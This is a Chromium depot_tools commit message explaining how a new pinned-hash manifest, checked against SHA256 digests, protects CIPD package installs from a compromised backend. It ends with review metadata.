Together with already committed cipd_client_version.digests file, this
cryptographically binds contents of CIPD packages used by depot_tools
with depot_tool's git revision (assuming the CIPD client pinned by
cipd_client_version.digests is trusted too, which can presumably be
verified when it is being pinned).
This holds true even if the CIPD backend is compromised. The worst that
can happen is a denial of service (e.g. if the backend refuses to serve
packages at all).
If a bad backend tries to serve a malicious (unexpected) CIPD client,
'cipd' bootstrap script (and its powershell counterpart) will detect
a mismatch between SHA256 of the fetched binary and what's specified in
cipd_client_version.digests, and will refuse to run the untrusted binary.
Similarly, if the bad backend tries to serve some other unexpected
package (in place of a package specified in cipd_manifest.txt), the CIPD
client (already verified and trusted as this point) will detect a mismatch
between what was fetched and what's pinned in cipd_manifest.versions, and
will refuse to install untrusted files.
cipd_manifest.versions was generated from cipd_manifest.txt by:
$ cipd ensure-file-resolve -ensure-file cipd_manifest.txt
This will have to be rerun each time cipd_manifest.txt is updated. There's
a presubmit check that verifies *.versions file is up-to-date (it's part
of 'cipd ensure-file-verify').
BUG=870166
R=nodir@chromium.org, iannucci@chromium.org, tandrii@chromium.org
Change-Id: I25314adf0a9b05c69cd16e75aff01dbc79c87aa5
Reviewed-on: https://chromium-review.googlesource.com/1227435
Commit-Queue: Vadim Shtayura <vadimsh@chromium.org>
Reviewed-by: Andrii Shyshkalov <tandrii@chromium.org>
Ryan Tseng
Robert Iannucci
Vadim Shtayura